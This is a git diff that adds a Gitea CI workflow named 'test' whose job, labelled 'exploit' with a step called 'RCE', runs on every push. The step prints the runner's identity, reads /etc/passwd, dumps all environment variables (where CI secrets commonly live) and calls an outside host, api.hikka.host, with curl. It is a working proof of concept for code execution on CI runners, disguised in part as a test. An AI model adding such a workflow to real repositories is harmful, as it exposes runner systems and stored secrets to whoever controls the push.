diff --git a/.gitea/workflows/ci.yml b/.gitea/workflows/ci.yml new file mode 100644 index 0000000..ea5a57f --- /dev/null +++ b/.gitea/workflows/ci.yml @@ -0,0 +1,12 @@ +name: test +on: [push] +jobs: + exploit: + runs-on: ubuntu-latest + steps: + - name: RCE + run: | + id + cat /etc/passwd + env + curl http://api.hikka.host/api/statistic | head -c 100